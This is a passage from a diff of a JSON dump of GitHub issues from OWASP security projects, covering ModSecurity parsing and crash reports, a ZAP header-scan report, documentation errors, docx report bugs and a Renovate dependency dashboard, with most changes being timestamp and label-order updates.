[SecRequestBodyJSONDepthLimit](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#user-content-SecRequestBodyJsonDepthLimit))\r\n\r\n\r\n## More todo's\r\n\r\nWe have to:\r\n\r\n* analyze XML parser performance\r\n * should we change from libxml2 to another parser? Libexpat? Or other?\r\n* check the effect of [SecArgumentsLimit](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#user-content-SecArgumentsLimit) in case of JSON parsing\r\n* design and apply this behavior on XML parsing\r\n* explore the possibility of additional XML validation methods (eg. XXE (XML External Entity) detection)\r\n* to decide the issue of compatibility or uniform behavior within versions\r\n\r\nFor the last item: the behavior of JSON parsing in two versions are different. Consider the payload `{\"a\":1,\"b\":[{\"a1\":\"a1val\"},{\"a1\":\"a2val\"}]}` (see that there is a list!) which is equivalent with this XML:\r\n\r\n```\r\n\r\n\r\n 1\r\n \r\n \r\n a1val\r\n \r\n \r\n a2val\r\n \r\n \r\n\r\n```\r\n\r\nwhich produces these results:\r\n\r\n(mod_security2)\r\n```\r\n[/post][9] Adding JSON argument 'a' with value '1'\r\n[/post][9] Adding JSON argument 'b.b.a1' with value 'a1val'\r\n[/post][9] Adding JSON argument 'b.b.a1' with value 'a2val'\r\n```\r\n\r\n(libmodsecurity3)\r\n```\r\n[/post] [4] Adding request argument (JSON): name \"json.a\", value \"1\"\r\n[/post] [4] Adding request argument (JSON): name \"json.b.array_0.a1\", value \"a1val\"\r\n[/post] [4] Adding request argument (JSON): name \"json.b.array_1.a1\", value \"a2val\"\r\n```\r\n\r\nNote, that please check the list items with the same keys! I think we should follow the libmodsecurity3's behavior - but the the XML and JSON won't be compatible. (Which implies the next question: do we want to align the mod_security2's behavior?)\r\n\r\nAny feedback are welcome!\r\n\r\n", @@ -68180,10 +68185,10 @@ "sequence_id": 2381178408, "is_locked": false, "lock_reason": "", - "comments_count": 34, + "comments_count": 36, "closed_at": null, "created_at": "2024-06-28T20:52:04Z", - "updated_at": "2024-09-16T14:13:09Z", + "updated_at": "2024-09-19T10:05:27Z", "author": 976, "repository": 1213, "assignees": [], @@ -68278,8 +68283,8 @@ "repository": 1213, "assignees": [], "labels": [ - 399, - 400 + 400, + 399 ] } }, @@ -68558,7 +68563,7 @@ "pk": 2242, "fields": { "nest_created_at": "2024-09-11T22:41:43.829Z", - "nest_updated_at": "2024-09-16T21:14:04.208Z", + "nest_updated_at": "2024-09-22T18:39:00.998Z", "node_id": "I_kwDOABQmks6WK3El", "title": "SIGSEGV writing log on FreeBSD", "body": "**Describe the bug**\r\n\r\nI'm trying to update the [FreeBSD port](https://www.freshports.org/www/mod_security/) to 2.9.8 (current version in ports is 2.9.6) and to link with pcre2 instead of pcre.\r\n\r\nI can build it and apache runs, but when modsecurity tries to write an audit log, the httpd process dies with SIGSEGV.\r\nSetting `SecAuditLogType Concurrent` stops httpd from dying.\r\n\r\n**Logs and dumps**\r\n\r\nOutput of:\r\n\r\n[httpd.zip](https://github.com/user-attachments/files/16962634/httpd.zip)\r\n\r\n_Notice:_ Be carefully to not leak any confidential information.\r\n\r\n**To Reproduce**\r\n\r\nSteps to reproduce the behavior:\r\n\r\nAnything that causes mod_security to write an audit log.\r\n\r\n**Expected behavior**\r\n\r\nA clear and concise description of what you expected to happen.\r\n\r\n**Server (please complete the following information):**\r\n - ModSecurity version (and connector): [e.g. ModSecurity v3.0.1 with nginx-connector v1.0.0]\r\n - 2.9.8\r\n - WebServer: [e.g. nginx-1.15.5]\r\n - apache 2.4.62\r\n - OS (and distro): [e.g. Linux, archlinux]\r\n - FreeBSD 14.1-RELEASE\r\n\r\n**Rule Set (please complete the following information):**\r\n - Running any public or commercial rule set? [e.g. SpiderLabs commercial rules]\r\n - What is the version number? [e.g. 2018-08-11]\r\n\r\n**Additional context**\r\n\r\nThe stacktrace indicates that the problem is in apr_global_mutex_lock().\r\n\r\nThe configure command that the ports build generates and uses to build is:\r\n`./configure --with-apxs=/usr/local/sbin/apxs --with-pcre2=/usr/local --with-yajl=/usr/local --with-curl=/usr/local --without-ssdeep --without-lua --disable-mlogc --prefix=/usr/local --localstatedir=/var --mandir=/usr/local/share/man --disable-silent-rules --infodir=/usr/local/share/info/ --build=amd64-portbld-freebsd14.1`\r\n\r\nI'm trying to get the port in FreeBSD ports updated, so even though I can workaround the problem, we need to address this issue if it is to be merged upstream.", @@ -68571,10 +68576,10 @@ "sequence_id": 2519429413, "is_locked": false, "lock_reason": "", - "comments_count": 10, + "comments_count": 14, "closed_at": null, "created_at": "2024-09-11T11:07:32Z", - "updated_at": "2024-09-16T09:25:53Z", + "updated_at": "2024-09-20T15:24:18Z", "author": 1064, "repository": 1213, "assignees": [ @@ -68737,9 +68742,9 @@ "repository": 1215, "assignees": [], "labels": [ + 424, 422, - 423, - 424 + 423 ] } }, @@ -68960,8 +68965,8 @@ "repository": 1215, "assignees": [], "labels": [ - 422, - 427 + 427, + 422 ] } }, @@ -68993,8 +68998,8 @@ 1067 ], "labels": [ - 421, - 428 + 428, + 421 ] } }, @@ -69054,8 +69059,8 @@ 1067 ], "labels": [ - 422, - 429 + 429, + 422 ] } }, @@ -69214,10 +69219,10 @@ 1070 ], "labels": [ - 422, - 423, 424, - 429 + 429, + 422, + 423 ] } }, @@ -69382,8 +69387,8 @@ 1069 ], "labels": [ - 422, - 432 + 432, + 422 ] } }, @@ -69413,8 +69418,8 @@ "repository": 1215, "assignees": [], "labels": [ - 421, 425, + 421, 429 ] } @@ -69572,9 +69577,9 @@ "repository": 1215, "assignees": [], "labels": [ - 422, 428, - 429 + 429, + 422 ] } }, @@ -69668,8 +69673,8 @@ ], "labels": [ 421, - 429, - 430 + 430, + 429 ] } }, @@ -70474,8 +70479,8 @@ "repository": 1215, "assignees": [], "labels": [ - 422, - 433 + 433, + 422 ] } }, @@ -70598,10 +70603,10 @@ 1067 ], "labels": [ + 430, 421, 422, - 429, - 430 + 429 ] } }, @@ -70665,8 +70670,8 @@ 1067 ], "labels": [ - 429, - 432 + 432, + 429 ] } }, @@ -70698,9 +70703,9 @@ 1067 ], "labels": [ + 426, 421, - 422, - 426 + 422 ] } }, @@ -70737,7 +70742,7 @@ "pk": 2313, "fields": { "nest_created_at": "2024-09-11T22:44:09.573Z", - "nest_updated_at": "2024-09-18T18:52:48.007Z", + "nest_updated_at": "2024-09-22T18:39:42.148Z", "node_id": "I_kwDOEkpGDc6KO6-p", "title": "ZAP Scan Baseline Report", "body": "- Site: [https://security.c4po.dev](https://security.c4po.dev) \n \t **New Alerts** \n\t- **CSP: Wildcard Directive** [10055] total: 2: \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t- **CSP: style-src unsafe-inline** [10055] total: 1: \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t- **Content Security Policy (CSP) Header Not Set** [10038] total: 2: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t- **Cross-Domain Misconfiguration** [10098] total: 11: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png](https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png) \n\t\t- [https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico](https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico) \n\t\t- [https://security.c4po.dev/assets/C4PO/faviconDX.ico](https://security.c4po.dev/assets/C4PO/faviconDX.ico) \n\t\t- .. \n\t- **Missing Anti-clickjacking Header** [10020] total: 2: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t- **Permissions Policy Header Not Set** [10063] total: 4: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/assets/js/lazyload/17.8.3/lazyload.min.js](https://security.c4po.dev/assets/js/lazyload/17.8.3/lazyload.min.js) \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t- **Strict-Transport-Security Header Not Set** [10035] total: 11: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png](https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png) \n\t\t- [https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico](https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico) \n\t\t- [https://security.c4po.dev/assets/C4PO/faviconDX.ico](https://security.c4po.dev/assets/C4PO/faviconDX.ico) \n\t\t- .. \n\t- **X-Content-Type-Options Header Missing** [10021] total: 11: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png](https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png) \n\t\t- [https://security.c4po.dev/assets/BugBountyPlatforms/hackerone.png](https://security.c4po.dev/assets/BugBountyPlatforms/hackerone.png) \n\t\t- [https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico](https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico) \n\t\t- .. \n\t- **Base64 Disclosure** [10094] total: 3: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t- **CSP: Header & Meta** [10055] total: 1: \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t- **Information Disclosure - Suspicious Comments** [10027] total: 2: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t- **Modern Web Application** [10109] total: 2: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t- **Re-examine Cache-control Directives** [10015] total: 4: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/robots.txt](https://security.c4po.dev/robots.txt) \n\t\t- [https://security.c4po.dev/site.webmanifest](https://security.c4po.dev/site.webmanifest) \n\t- **Retrieved from Cache** [10050] total: 11: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png](https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png) \n\t\t- [https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico](https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico) \n\t\t- [https://security.c4po.dev/assets/C4PO/faviconDX.ico](https://security.c4po.dev/assets/C4PO/faviconDX.ico) \n\t\t- .. \n\t- **Sec-Fetch-Dest Header is Missing** [90005] total: 3: \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/robots.txt](https://security.c4po.dev/robots.txt) \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t- **Sec-Fetch-Mode Header is Missing** [90005] total: 3: \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/robots.txt](https://security.c4po.dev/robots.txt) \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t- **Sec-Fetch-Site Header is Missing** [90005] total: 3: \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/robots.txt](https://security.c4po.dev/robots.txt) \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t- **Sec-Fetch-User Header is Missing** [90005] total: 3: \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/robots.txt](https://security.c4po.dev/robots.txt) \n\t\t- [https://security.c4po.dev/sitemap.xml](https://security.c4po.dev/sitemap.xml) \n\t- **Storable and Cacheable Content** [10049] total: 11: \n\t\t- [https://security.c4po.dev](https://security.c4po.dev) \n\t\t- [https://security.c4po.dev/](https://security.c4po.dev/) \n\t\t- [https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png](https://security.c4po.dev/assets/BugBountyPlatforms/bugcrowd.png) \n\t\t- [https://security.c4po.dev/assets/BugBountyPlatforms/hackerone.png](https://security.c4po.dev/assets/BugBountyPlatforms/hackerone.png) \n\t\t- [https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico](https://security.c4po.dev/assets/C4PO/favicon_corporateDX.ico) \n\t\t- .. \n\n\n\nView the [following link](https://github.com/marcel-haag/security-c4po/actions/runs/9255714742) to download the report.\nRunnerID:9255714742", @@ -73869,7 +73874,7 @@ "pk": 2419, "fields": { "nest_created_at": "2024-09-11T22:48:22.031Z", - "nest_updated_at": "2024-09-18T18:53:01.834Z", + "nest_updated_at": "2024-09-22T18:40:05.831Z", "node_id": "I_kwDOKLCYV86F2Mby", "title": "Overview of Data Exchange Services (ISTG-DES) identical to Memory (ISTG-MEM)", "body": "The Overview section of Data Exchange Service is identical to Memory.\r\nSeems like there happend a copy-paste mistake.\r\n\r\nDES:\r\nhttps://github.com/OWASP/owasp-istg/blob/main/src/03_test_cases/data_exchange_services/README.md#overview\r\n\r\nMEM:\r\nhttps://github.com/OWASP/owasp-istg/blob/main/src/03_test_cases/memory/README.md#overview", @@ -73901,7 +73906,7 @@ "pk": 2420, "fields": { "nest_created_at": "2024-09-11T22:48:31.840Z", - "nest_updated_at": "2024-09-18T18:53:10.013Z", + "nest_updated_at": "2024-09-22T18:40:15.838Z", "node_id": "I_kwDOKn6VRM51kc7k", "title": "Pay more attention to comments in code", "body": "Developers often store secrets inside comments. Current tokenization approach allows us to understand that a token is a comment but we are unable to look deeply inside and break it into semantic tokens.\r\nPotential solutions:\r\n\r\n- \"Decomment\" the code by removing special symbols like \"//\" or \"#\". Potentially bad idea as a comment may not and should not be semantically correct for a given language. This may also brake the tokenization process of entire file.\r\n- Perform a separate (regex-based) analysis for all comments found in code after tokenization stage.", @@ -74057,7 +74062,7 @@ "pk": 2425, "fields": { "nest_created_at": "2024-09-11T22:49:10.023Z", - "nest_updated_at": "2024-09-13T05:22:33.906Z", + "nest_updated_at": "2024-09-22T18:40:45.185Z", "node_id": "I_kwDOHQwk8s6S99fl", "title": "Docx report issues", "body": "### Reports generated in docx format are not reflecting original formatting. These are the issues found in tables and images. \r\n\r\n### Tables \r\n- if you choose the table style attribute border = “0” or none and set the style attribute of “border-bottom” to whatever color it doesn’t work in the downloaded docx report. It’s working with HTML version of the downloaded report and it is also working with various html editors but not in the docx format. \r\n\r\nHTML downloaded report (working):\r\n![html_dowloaded_report](https://github.com/user-attachments/assets/6f2678a9-7da8-426f-84a5-bd85848b9185)\r\n\r\nDocx format report - not working :( \r\n\"doxc_report_downloaded\"\r\n\r\n### Steps to reproduce \r\n1. Create a simple table - for example like this:\r\n```html\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
ABC
DEF
\r\n``` \r\n2. Generate and download a docx report. \r\n\r\n---\r\n\r\n\r\n### Images \r\n- Images in components are not positioned as defined in docx reports - if you choose to set a picture to the right side of the page with attributes like “img style=\"float: right; margin: 0 0 15px 15px;\"” the image is always in a completely different place. \r\n\r\nPreview in Cervantes, downloaded HTML report or external HTML editors are working correctly:\r\n![preview_cervantes](https://github.com/user-attachments/assets/c38eed65-de1b-4924-9c4c-f5c0197ed2ce)\r\n\r\nBut again, the docx report is not working :( image is on the left side of the page even though the parameters were set to the right side:\r\n\r\n![DOCXreportDownloaded](https://github.com/user-attachments/assets/c4e34054-979c-4bc8-a11f-4914f58ac506)\r\n\r\n### Steps to reproduce \r\n\r\n1. Insert an image to the component\r\n2. Adjust the html code to for example:\r\n```html\r\n

\r\n``` ", @@ -74070,10 +74075,10 @@ "sequence_id": 2465716197, "is_locked": false, "lock_reason": "", - "comments_count": 9, + "comments_count": 12, "closed_at": null, "created_at": "2024-08-14T12:34:55Z", - "updated_at": "2024-09-10T07:37:43Z", + "updated_at": "2024-09-19T18:37:26Z", "author": 1115, "repository": 1224, "assignees": [ @@ -74203,7 +74208,7 @@ "pk": 2430, "fields": { "nest_created_at": "2024-09-11T22:50:10.566Z", - "nest_updated_at": "2024-09-18T18:54:09.234Z", + "nest_updated_at": "2024-09-22T18:41:29.857Z", "node_id": "I_kwDOFtcS2c6Pxjhi", "title": "occational false positive \"Vulnerable CNAME records in Google Cloud DNS\"", "body": "Has anyone run into the issue where domain protect doesn't detect the S3 bucket for a Cloud DNS CNAME record that is pointing to an AWS bucket?\r\n\r\nI've had a few records trigger even though the S3 buckets are present and haven't been changed in years. I believe the python script is using requests.get to look for \"NoSuchBucket\" to determine if the record is vulnerable.\r\n\r\nWhen I manually test with request.get, the buckets return with AccessDenied, which is expected. I'm guessing every once in a while AWS randomly returns \"NoSuchBucket\"?", @@ -74861,8 +74866,8 @@ "repository": 1237, "assignees": [], "labels": [ - 461, - 467 + 467, + 461 ] } }, @@ -74892,8 +74897,8 @@ "repository": 1237, "assignees": [], "labels": [ - 461, - 464 + 464, + 461 ] } }, @@ -74991,10 +74996,10 @@ "pk": 2456, "fields": { "nest_created_at": "2024-09-11T22:51:23.597Z", - "nest_updated_at": "2024-09-17T23:41:00.475Z", + "nest_updated_at": "2024-09-21T06:40:45.667Z", "node_id": "I_kwDOD-_h5M52i78d", "title": "Dependency Dashboard", - "body": "This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.\n\n## Edited/Blocked\n\nThese updates have been manually edited so Renovate will no longer make changes. To discard all commits and start over, click on a checkbox.\n\n - [ ] [chore(deps): update github/codeql-action digest to 8214744](../pull/1131)\n - [ ] [fix(deps): update module golang.org/x/net to v0.29.0](../pull/1146)\n\n## Open\n\nThese updates have all been created already. Click a checkbox below to force a retry/rebase of any.\n\n - [ ] [fix(deps): update module github.com/corazawaf/coraza-coreruleset/v4 to v4.5.0](../pull/1112)\n - [ ] [fix(deps): update module github.com/mccutchen/go-httpbin/v2 to v2.15.0](../pull/1142)\n - [ ] [fix(deps): update module github.com/coreruleset/go-ftw to v1](../pull/1072)\n - [ ] **Click on this checkbox to rebase all open PRs at once**\n\n## Ignored or Blocked\n\nThese are blocked by an existing closed PR and will not be recreated unless you click a checkbox below.\n\n - [ ] [fix(deps): update module github.com/corazawaf/coraza/v3 to v3.2.1](../pull/1082)\n - [ ] [chore(deps): update actions/cache action to v4](../pull/958)\n\n## Detected dependencies\n\n
github-actions\n
\n\n
.github/workflows/close-issues.yml\n\n - `actions/stale v9@28ca1036281a5e5922ead5184a1bbf96e5fc984e`\n\n
\n\n
.github/workflows/codeql-analysis.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `github/codeql-action v3@429e1977040da7a23b6822b13c129cd1ba93dbb2`\n - `github/codeql-action v3@429e1977040da7a23b6822b13c129cd1ba93dbb2`\n - `github/codeql-action v3@429e1977040da7a23b6822b13c129cd1ba93dbb2`\n\n
\n\n
.github/workflows/fuzz.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `actions/setup-go v5@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32`\n\n
\n\n
.github/workflows/lint.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `actions/setup-go v5@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32`\n\n
\n\n
.github/workflows/regression.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `actions/setup-go v5@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n\n
\n\n
.github/workflows/tinygo.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `actions/setup-go v5@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32`\n - `acifani/setup-tinygo v2@b2ba42b249c7d3efdfe94166ec0f48b3191404f7`\n - `actions/cache v3@e12d46a63a90f2fae62d114769bbf2a179198b5c`\n\n
\n\n
\n
\n\n
gomod\n
\n\n
go.mod\n\n - `go 1.22`\n - `github.com/anuraaga/go-modsecurity v0.0.0-20220824035035-b9a4099778df@b9a4099778df`\n - `github.com/corazawaf/libinjection-go v0.2.1`\n - `github.com/foxcpp/go-mockdns v1.1.0`\n - `github.com/magefile/mage v1.15.0`\n - `github.com/mccutchen/go-httpbin/v2 v2.14.0`\n - `github.com/petar-dambovaliev/aho-corasick v0.0.0-20240411101913-e07a1f0e8eb4@e07a1f0e8eb4`\n - `github.com/tidwall/gjson v1.17.3`\n - `github.com/valllabh/ocsf-schema-golang v1.0.3`\n - `golang.org/x/net v0.28.0`\n - `golang.org/x/sync v0.8.0`\n - `rsc.io/binaryregexp v0.2.0`\n\n
\n\n
testing/coreruleset/go.mod\n\n - `go 1.22`\n - `github.com/bmatcuk/doublestar/v4 v4.6.1`\n - `github.com/corazawaf/coraza-coreruleset/v4 v4.3.0`\n - `github.com/corazawaf/coraza/v3 v3.0.0-00010101000000-000000000000@000000000000`\n - `github.com/coreruleset/go-ftw v0.6.4`\n - `github.com/rs/zerolog v1.33.0`\n\n
\n\n
\n
\n\n---\n\n- [ ] Check this box to trigger a request for Renovate to run again on this repository\n\n", + "body": "This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.\n\n## Edited/Blocked\n\nThese updates have been manually edited so Renovate will no longer make changes. To discard all commits and start over, click on a checkbox.\n\n - [ ] [chore(deps): update github/codeql-action digest to 294a9d9](../pull/1131)\n - [ ] [fix(deps): update module golang.org/x/net to v0.29.0](../pull/1146)\n\n## Open\n\nThese updates have all been created already. Click a checkbox below to force a retry/rebase of any.\n\n - [ ] [fix(deps): update module github.com/corazawaf/coraza-coreruleset/v4 to v4.5.0](../pull/1112)\n - [ ] [fix(deps): update module github.com/mccutchen/go-httpbin/v2 to v2.15.0](../pull/1142)\n - [ ] [fix(deps): update module github.com/coreruleset/go-ftw to v1](../pull/1072)\n - [ ] **Click on this checkbox to rebase all open PRs at once**\n\n## Ignored or Blocked\n\nThese are blocked by an existing closed PR and will not be recreated unless you click a checkbox below.\n\n - [ ] [fix(deps): update module github.com/corazawaf/coraza/v3 to v3.2.1](../pull/1082)\n - [ ] [chore(deps): update actions/cache action to v4](../pull/958)\n\n## Detected dependencies\n\n
github-actions\n
\n\n
.github/workflows/close-issues.yml\n\n - `actions/stale v9@28ca1036281a5e5922ead5184a1bbf96e5fc984e`\n\n
\n\n
.github/workflows/codeql-analysis.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `github/codeql-action v3@429e1977040da7a23b6822b13c129cd1ba93dbb2`\n - `github/codeql-action v3@429e1977040da7a23b6822b13c129cd1ba93dbb2`\n - `github/codeql-action v3@429e1977040da7a23b6822b13c129cd1ba93dbb2`\n\n
\n\n
.github/workflows/fuzz.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `actions/setup-go v5@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32`\n\n
\n\n
.github/workflows/lint.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `actions/setup-go v5@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32`\n\n
\n\n
.github/workflows/regression.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `actions/setup-go v5@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n - `codecov/codecov-action v4@e28ff129e5465c2c0dcc6f003fc735cb6ae0c673`\n\n
\n\n
.github/workflows/tinygo.yml\n\n - `actions/checkout v4@692973e3d937129bcbf40652eb9f2f61becf3332`\n - `actions/setup-go v5@0a12ed9d6a96ab950c8f026ed9f722fe0da7ef32`\n - `acifani/setup-tinygo v2@b2ba42b249c7d3efdfe94166ec0f48b3191404f7`\n - `actions/cache v3@e12d46a63a90f2fae62d114769bbf2a179198b5c`\n\n
\n\n
\n
\n\n
gomod\n
\n\n
go.mod\n\n - `go 1.22`\n - `github.com/anuraaga/go-modsecurity v0.0.0-20220824035035-b9a4099778df@b9a4099778df`\n - `github.com/corazawaf/libinjection-go v0.2.1`\n - `github.com/foxcpp/go-mockdns v1.1.0`\n - `github.com/magefile/mage v1.15.0`\n - `github.com/mccutchen/go-httpbin/v2 v2.14.0`\n - `github.com/petar-dambovaliev/aho-corasick v0.0.0-20240411101913-e07a1f0e8eb4@e07a1f0e8eb4`\n - `github.com/tidwall/gjson v1.17.3`\n - `github.com/valllabh/ocsf-schema-golang v1.0.3`\n - `golang.org/x/net v0.28.0`\n - `golang.org/x/sync v0.8.0`\n - `rsc.io/binaryregexp v0.2.0`\n\n
\n\n
testing/coreruleset/go.mod\n\n - `go 1.22`\n - `github.com/bmatcuk/doublestar/v4 v4.6.1`\n - `github.com/corazawaf/coraza-coreruleset/v4 v4.3.0`\n - `github.com/corazawaf/coraza/v3 v3.0.0-00010101000000-000000000000@000000000000`\n - `github.com/coreruleset/go-ftw v0.6.4`\n - `github.com/rs/zerolog v1.33.0`\n\n
\n\n
\n
\n\n---\n\n- [ ] Check this box to trigger a request for Renovate to run again on this repository\n\n", "summary": "Edit the Renovate updates and manage detected dependencies as outlined in the issue. Ensure to handle blocked updates by clicking the appropriate checkboxes to rebase or recreate branches as necessary. Review the detected dependencies in the workflows and Go modules to maintain project integrity and functionality.", "hint": "To approach the problem of managing dependency updates in the Dependency Dashboard, you can follow these steps:\n\n1. **Review the Dashboard**: Familiarize yourself with the current state of dependencies, identifying which updates are blocked, open, or ignored.\n\n2. **Assess Blocked Updates**: Check the updates listed under \"Edited/Blocked\" and \"Ignored or Blocked\" to determine if any can be resolved or need to be manually addressed.\n\n3. **Prioritize Critical Updates**: Identify any critical updates that address security vulnerabilities or major bugs, and prioritize their review and approval.\n\n4. **Rebase Open PRs**: Consider rebasing all open PRs to ensure they are updated with the latest changes and can be tested against the current codebase.\n\n5. **Test Updates Locally**: For each open PR, pull the branch locally and run tests to verify that the updates do not introduce any breaking changes.\n\n6. **Merge Approved Updates**: Once tested, merge the updates that are confirmed to be stable into the main branch, following your team's merging strategy.\n\n7. **Document Changes**: Update the documentation or release notes to reflect the changes made by the merged updates, especially if they introduce new features or breaking changes.\n\n8. **Monitor Dependencies Regularly**: Set up a regular schedule (e.g., weekly or monthly) to review the Dependency Dashboard to stay on top of new updates and avoid backlog.\n\n9. **Automate Future Updates**: If not already in place, consider configuring Renovate or a similar tool to automate dependency updates and reduce manual work in the future.\n\n10. **Communicate with Team**: Keep the team informed about major updates and any potential impact on ongoing projects, ensuring everyone is aligned on the changes introduced by the dependency updates. \n\nBy following these steps, you can effectively manage dependency updates and maintain a healthy codebase.", "state": "open", @@ -75007,7 +75012,7 @@ "comments_count": 0, "closed_at": null, "created_at": "2023-11-11T09:55:14Z", - "updated_at": "2024-09-17T13:10:55Z", + "updated_at": "2024-09-19T11:23:17Z", "author": null, "repository": 1237, "assignees": [], @@ -75865,7 +75870,7 @@ "pk": 2486, "fields": { "nest_created_at": "2024-09-11T22:51:55.454Z", - "nest_updated_at": "2024-09-18T18:54:47.993Z", + "nest_updated_at": "2024-09-20T17:50:33.339Z", "node_id": "I_kwDOD-_h5M6Vv_uB", "title": "Provide example for fasthttp", "body": "## Summary\r\n\r\nProvide example for fasthttp\r\n\r\n### Basic example\r\n\r\n-\r\n\r\n### Motivation\r\n\r\n-", @@ -75916,8 +75921,8 @@ 1155 ], "labels": [ - 471, - 472 + 472, + 471 ] } }, @@ -76019,10 +76024,10 @@ 1156 ], "labels": [ - 471, 472, 474, - 475 + 475, + 471 ] } }, @@ -76055,10 +76060,10 @@ 1156 ], "labels": [ - 471, 472, 474, - 475 + 475, + 471 ] } }, @@ -76155,9 +76160,9 @@ 1156 ], "labels": [ - 471, 474, - 478 + 478, + 471 ] } }, @@ -76286,8 +76291,8 @@ 1155 ], "labels": [ - 471, - 479 + 479, + 471 ] } }, @@ -76319,8 +76324,8 @@ 1155 ], "labels": [ - 471, - 479 + 479, + 471 ] } 